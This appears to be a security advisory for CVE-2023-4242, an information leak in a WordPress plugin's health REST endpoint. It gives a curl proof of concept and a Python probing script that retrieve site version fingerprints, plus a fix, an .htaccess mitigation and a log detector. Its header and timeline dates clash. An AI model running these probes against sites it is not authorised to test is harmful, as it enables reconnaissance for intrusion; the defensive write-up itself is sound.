CVE-2023-4242 - Information Disclosure Vulnerability in FULL - Customer WordPress Plugin
Published: 2024-06-02
Affected Plugin: FULL - Customer
Vulnerable Versions: Up to and including 2.2.3
Vulnerability Type: Information Disclosure
CVSS Score: 5.3 (Medium)
Exploit Requirements: *Authenticated user (subscriber-level or higher)*
Overview
CVE-2023-4242 is an information disclosure flaw in the FULL – Customer WordPress plugin. On sites running version 2.2.3 or older, any authenticated user, down to a subscriber account, can read sensitive site details by calling the plugin's /health REST API endpoint.
The endpoint returns the kind of WordPress health-check data normally reserved for administrators, handing an attacker a ready-made fingerprint of the site for follow-up attacks.
How Does the Vulnerability Work?
The plugin exposes a REST API route, /wp-json/full-customer/v1/health, which reveals information about WordPress’s configuration—like the active theme, PHP version, server software, and plugin statuses. Normally, this information is only accessible to administrators. However, the plugin’s code failed to restrict access, allowing any authenticated WordPress user—even a basic *subscriber*—to call this endpoint.
Vulnerable Code Snippet
Below is a simplified, annotated reconstruction of what the vulnerable route registration might look like in the plugin's code (not the plugin's verbatim source):

```php
// File: includes/class-full-customer-rest.php (simplified reconstruction; runs inside the plugin's rest_api_init callback)
register_rest_route(
    'full-customer/v1',
    '/health',
    array(
        'methods'             => 'GET',
        'callback'            => array( $this, 'get_health_info' ),
        // INCORRECT: any logged-in account passes this check, subscribers included
        'permission_callback' => function () {
            return is_user_logged_in();
        },
    )
);
```
What’s the issue?
`is_user_logged_in()` only confirms that the request comes from some authenticated account; it says nothing about capabilities, so a subscriber passes exactly the same check as an administrator. For data that is meant to be admin-only, the permission callback has to test a capability, not a session.
A safer permission callback would look like this:

```php
'permission_callback' => function () {
    return current_user_can( 'manage_options' ); // administrators only
},
```
Proof-of-Concept (PoC) Exploit
Here's how an attacker with a basic account (such as a subscriber) can retrieve the health data. The request must actually be authenticated in the REST API's eyes: a bare WordPress login cookie is not enough, because cookie-authenticated REST requests without a valid X-WP-Nonce header are treated as anonymous. The simplest route is an application password (WordPress 5.6+), which any user can create from their own profile page:

```bash
# APPLICATION_PASSWORD is a placeholder for the subscriber account's application password
curl -u "subscriber:APPLICATION_PASSWORD" \
  https://your-vulnerable-site.com/wp-json/full-customer/v1/health
```
Response Example (illustrative, additional fields omitted):

```json
{
  "wp_version": "6.3.1",
  "php_version": "8.1.12",
  "active_theme": "Astra",
  "plugins": [
    {"name": "WooCommerce", "version": "7.6.5"},
    {"name": "Full Customer", "version": "2.2.3"}
  ],
  "server_software": "Apache"
}
```
This reveals a lot: your core versions, tech stack, theme, plugins, and other data. Attackers often use this info to plan follow-up attacks.
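The same check as a script, so you can run it against your own site with a throwaway subscriber account before and after updating. This is an added example, not code from the page or the plugin; it assumes a WordPress 5.6+ site with application passwords enabled (the default) and that a patched plugin answers a non-admin with a 403 `rest_forbidden` error, which is what `current_user_can()` returning false produces for a logged-in caller. The sample response bodies are constructed from the page's example.

```python
"""Scripted version of the PoC: request the FULL - Customer /health route as a
low-privilege account and classify the result.  Added example, not plugin code.
Assumes a WordPress 5.6+ site with application passwords enabled (the default).
"""
import base64
import json
import urllib.error
import urllib.request

HEALTH_ROUTE = "/wp-json/full-customer/v1/health"
# Keys the page's sample response shows; any one of them present means the
# health payload was handed to the caller.
FINGERPRINT_KEYS = ("wp_version", "php_version", "active_theme", "plugins", "server_software")


def fetch_health(base_url, username, app_password, timeout=10):
    """GET the health route with HTTP Basic auth (WordPress application password).

    Returns (status, body).  This is the only network call; the offline checks
    below never use it.
    """
    token = base64.b64encode(f"{username}:{app_password}".encode()).decode()
    req = urllib.request.Request(
        base_url.rstrip("/") + HEALTH_ROUTE,
        headers={"Authorization": f"Basic {token}", "Accept": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def assess(status, body, caller_is_admin):
    """Classify one response from the health route.

    'vulnerable'   a non-admin caller received the health payload (CVE-2023-4242)
    'patched'      a non-admin caller was refused with 403 (behaviour from 2.2.4)
    'expected'     an admin caller received the payload, which is by design
    'auth_failed'  401: the credentials were rejected, so nothing was learned
    'inconclusive' anything else (route missing, plugin inactive, non-JSON body)
    """
    if status == 401:
        return "auth_failed"
    if status == 200:
        try:
            data = json.loads(body)
        except ValueError:
            return "inconclusive"
        if isinstance(data, dict) and any(k in data for k in FINGERPRINT_KEYS):
            return "expected" if caller_is_admin else "vulnerable"
        return "inconclusive"
    if status == 403 and not caller_is_admin:
        return "patched"
    return "inconclusive"


def disclosed_fingerprint(body):
    """Flatten the fields an attacker would harvest into 'component=version' strings."""
    data = json.loads(body)
    items = [f"{k}={data[k]}" for k in ("wp_version", "php_version", "active_theme", "server_software") if k in data]
    for plugin in data.get("plugins", []):
        items.append(f"plugin:{plugin.get('name')}={plugin.get('version')}")
    return items


# Constructed sample responses modelled on the page's example, for offline use.
SAMPLE_VULNERABLE_BODY = json.dumps({
    "wp_version": "6.3.1",
    "php_version": "8.1.12",
    "active_theme": "Astra",
    "plugins": [
        {"name": "WooCommerce", "version": "7.6.5"},
        {"name": "Full Customer", "version": "2.2.3"},
    ],
    "server_software": "Apache",
})
SAMPLE_PATCHED_BODY = json.dumps({
    "code": "rest_forbidden",
    "message": "Sorry, you are not allowed to do that.",
    "data": {"status": 403},
})

if __name__ == "__main__":
    import sys
    # Live use: python check_health.py https://example.com subscriber APP_PASSWORD
    if len(sys.argv) == 4:
        status, body = fetch_health(sys.argv[1], sys.argv[2], sys.argv[3])
        verdict = assess(status, body, caller_is_admin=False)
        print(status, verdict)
        if verdict == "vulnerable":
            print("\n".join(disclosed_fingerprint(body)))
    else:
        print(assess(200, SAMPLE_VULNERABLE_BODY, False))
        print(assess(403, SAMPLE_PATCHED_BODY, False))
```

Run it with a subscriber's application password: a `vulnerable` verdict means the update has not landed (or a cached copy of the plugin is still active); `auth_failed` means the application password itself was rejected, so re-create it rather than drawing any conclusion about the plugin.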
What Can Attackers Do With This Exposure?
- Reconnaissance: They now know your WordPress, plugin, PHP, and server versions to exploit other known vulnerabilities.
- Targeted Attacks: An attacker who sees "Full Customer" 2.2.3 and a specific WooCommerce version can go straight to the exploits published for those exact versions.
Patch & Mitigations
Plugin authors patched this in 2.2.4 by restricting the /health endpoint to admins only.
If you’re using FULL – Customer ≤ 2.2.3
- Update Immediately: upgrade to 2.2.4 or later.
Simple .htaccess mitigation example (Apache 2.4) for the window before you can update:

```apache
<If "%{REQUEST_URI} =~ m#/wp-json/full-customer/v1/health# || %{QUERY_STRING} =~ m#rest_route=(%2F|/)full-customer(%2F|/)v1(%2F|/)health#">
    Require ip 127.0.0.1
</If>
```

Two caveats. First, WordPress also serves every REST route through the `?rest_route=` query-string fallback, so a rule that only inspects REQUEST_URI can be sidestepped with `/?rest_route=/full-customer/v1/health` (or its percent-encoded form); the second condition above covers that. Second, this blocks everyone except localhost, administrators included, so treat it as a stop-gap and not a replacement for the update.
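If you were exposed, the next question is who already called the endpoint. The following detection logic, an added example rather than anything from the page or the plugin, scans access-log lines in the Apache/Nginx combined format for both forms of the route, the pretty `/wp-json/` path and the `?rest_route=` fallback, normalising percent-encoding first so the encoded variant that slips past a naive REQUEST_URI match is still caught. The log lines are constructed samples.

```python
"""Detection: find requests that reached the FULL - Customer /health route in an
Apache/Nginx combined-format access log.  Added example, not plugin code.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

HEALTH_ROUTE = "/full-customer/v1/health"

# Combined log format: ip ident user [ts] "METHOD target HTTP/x" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_health_request(target):
    """True if the request target reaches the plugin's health route by either
    of the two forms WordPress serves REST routes under:
      - the pretty permalink path  /wp-json/full-customer/v1/health
      - the fallback query string  /?rest_route=/full-customer/v1/health
    Percent-encoding (rest_route=%2Ffull-customer...) is decoded first, which
    is exactly what a naive REQUEST_URI regex in .htaccess does not do.
    """
    parts = urlsplit(target)
    path = unquote(parts.path).rstrip("/")
    if path.endswith("/wp-json" + HEALTH_ROUTE):  # endswith: covers subdirectory installs
        return True
    for route in parse_qs(parts.query).get("rest_route", []):
        if unquote(route).rstrip("/") == HEALTH_ROUTE:  # second unquote: double-encoded variants
            return True
    return False


def scan(lines):
    """Return [(ip, status, target)] for every health-route request in the log."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_health_request(m.group("target")):
            hits.append((m.group("ip"), int(m.group("status")), m.group("target")))
    return hits


def disclosing_clients(lines):
    """Count, per client IP, the health requests answered with 200, i.e. the
    calls that actually received the health payload (a 403 means it was refused)."""
    return Counter(ip for ip, status, _ in scan(lines) if status == 200)


# Constructed sample log lines for offline use.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Aug/2023:09:12:01 +0000] "GET /wp-json/full-customer/v1/health HTTP/1.1" 200 1843 "-" "curl/8.1.2"',
    '203.0.113.7 - - [10/Aug/2023:09:12:05 +0000] "GET /?rest_route=%2Ffull-customer%2Fv1%2Fhealth HTTP/1.1" 200 1843 "-" "curl/8.1.2"',
    '198.51.100.4 - - [10/Aug/2023:09:15:40 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Aug/2023:09:16:02 +0000] "GET /wp-json/full-customer/v1/health/ HTTP/1.1" 403 118 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Aug/2023:09:20:11 +0000] "GET /shop/product/health-foods/ HTTP/1.1" 200 5520 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, target in scan(SAMPLE_LOG):
        print(f"{ip} {status} {target}")
    print(dict(disclosing_clients(SAMPLE_LOG)))
```

Feed it your real log with `scan(open("access.log"))`. The IPs that show up in `disclosing_clients` with 200 responses before your update are the ones that now hold your version fingerprint; the 403 hits after the update confirm the fix is live.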
Conclusion
This bug is a reminder: always use proper permission checks in your WordPress plugins, especially for anything revealing system info. If your site uses the FULL – Customer plugin, update now. Even if this looks like a minor leak, every extra detail you give attackers makes their job easier.
*Stay safe and keep your WordPress plugins up to date!*
Timeline
Published on: 08/09/2023 04:15:00 UTC
Last modified on: 08/14/2023 15:27:00 UTC